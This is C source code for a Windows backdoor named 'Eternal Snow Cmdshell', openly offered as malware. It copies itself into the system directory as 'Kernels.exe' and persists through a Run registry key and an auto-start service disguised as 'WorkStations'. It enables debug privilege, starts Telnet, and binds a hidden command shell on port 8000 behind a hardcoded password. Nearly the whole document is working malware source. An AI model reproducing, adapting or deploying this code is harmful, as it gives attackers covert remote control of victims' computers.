Delphiscn Eternal Snow Cmdshell Version 1.0

/*

Delphiscn Eternal Snow Cmdshell Version 1.0

This Backdoor is written by Delphiscn.It is support for Windows NT/2000/XP/2003.
You can use a nc to control a remote computer which is runing with this software.

Complied and Tested in Windows XP SP2 CN 2000/2003 NOT TESTED.

Can not run in Windows 98/ME

Details

Eternal snow will create a service(Workstations) on the Remote System. And Bind Service Computer on port 8000.

Then.It will also Try to Start Telnet Service in the Remote System which is support for NT.

An Attacker can control it IF he konw the password --Neverland.

Referrence

1.msdn

2.www.xFocus.org

More Information

Delphiscn@www.EvilOctal.com
cnBlater(at)hotmail(dot)com
http://spaces.msn.com/members/delphiscn

2005-08-15*/

#include<winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsvc.h>
#include <Psapi.h>
#pragma comment( lib,"Psapi.lib")
#pragma comment(lib, "ws2_32.lib")

#define password "Neverland"

BOOL reg(char *szExecFile);
void OnCreate();
void StartTelnet();
void Help();

BOOL reg(char *szExecFile)
{
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\";
long snow0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(snow0!=ERROR_SUCCESS) return(false);
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
long snow1=::RegQueryValueEx(hKEY,"Dlls", 0,&dwType, username_Get,&cbData_1);
if(snow1!=ERROR_SUCCESS)
{
DWORD setsize;
setsize=strlen(szExecFile)+1;
dwType=REG_SZ;
long snow3=::RegSetValueEx(hKEY,"Kernels", 0, dwType, (const unsigned char*) szExecFile, setsize);
if(snow3!=ERROR_SUCCESS) {return(false);}
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);
}

int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
/*
Thanks to Sunlion[E.S.T]
*/
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0;
if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return 0;
}

void Help()
{
printf("Eternal Sonw Cmdshell in Windows NT System Support For 2000/XP/2003 Version 1.0\n");
printf("CODE BY Delphiscn@www.EvilOctal.com E-mail:cnBlaster(at)hotmail(dot)com\n");
printf("Complied in Windows XP SP2 CN 2005-08");
return;
}

int main(int argc,char *argv[])
{
GetModuleFileName(NULL,argv[0],255);
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe");
if( strcmp(argv[0],szNewPlace) != 0 )
{CopyFile(argv[0],szNewPlace,FALSE);}
if(!reg(szNewPlace))
{return 0;}
OnCreate();
StartTelnet();
system("cls.exe");
Help();
WSADATA wsaData;
char buff[4096];
int Eternal;
if ((Eternal = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup Failed: %d\n",Eternal);
return -1;
}
int port=8000;
int RemoteServer,LocalClient;
struct sockaddr_in addrServer,addrClient;
char *MSG="\n\r Welcome Hacker";
char *getpass="\r\n Your Password is:";
char *passok="\r\n ok";
char *error="\r\n Error Password Please Try it again";
RemoteServer=socket(AF_INET,SOCK_STREAM,0);
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(port);
addrServer.sin_addr.s_addr=ADDR_ANY;
int TimeOut=50000;
setsockopt(RemoteServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
UINT bReUser=1;
setsockopt(RemoteServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
bind(RemoteServer,(struct sockaddr*)&addrServer,sizeof(addrServer));
listen(RemoteServer,5);
printf("Bind Server is OK\n%d",port);
int iLen=sizeof(addrClient);
LocalClient=accept(RemoteServer,(struct sockaddr*)&addrClient,&iLen);
if (LocalClient != INVALID_SOCKET)
{
int iTimeOut=50000;
setsockopt(LocalClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
}
else return -1;
send(LocalClient,MSG,strlen(MSG),0);
send(LocalClient,getpass,strlen(getpass),0);
recv(LocalClient,buff,1024,0);
if(!(strstr(buff,password)))
{
send(LocalClient, error, strlen(error), 0);
printf("\r\n PassWord ERROR!");
closesocket(LocalClient);
}
send(LocalClient, passok, strlen(passok), 0);
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
char cmdLine[] = "Kernels.exe";
PROCESS_INFORMATION ProcessInformation;
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;
printf("\r\n Pipe Create OK!");
int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
while(1)
{
int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret = send(LocalClient,buff,lBytesRead,0);
if(ret <= 0) break;
}
else
{

lBytesRead = recv(LocalClient,buff,1024,0);
if(lBytesRead <= 0) break;
ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
}
}
closesocket(LocalClient);
closesocket(RemoteServer);
return 0;
}

void OnCreate()
{
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe");
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
scv=::CreateService(scm,
"WorkStations",
"WorkStations",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szNewPlace,
NULL,NULL,NULL,NULL);
if (scv!=NULL)
{
::CloseServiceHandle(scv);
}
else
{
::CloseServiceHandle(scm);
}
}
}

void StartTelnet()
{
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
{
scv=::OpenService(scm,"Telnet",SERVICE_ALL_ACCESS);
if (scv!=NULL)
{
::StartService(scv,0,NULL);
::CloseServiceHandle(scv);
}
::CloseServiceHandle(scm);
}
}

/*

Complied with Visual C++.Net

Good Luck ^.^

*/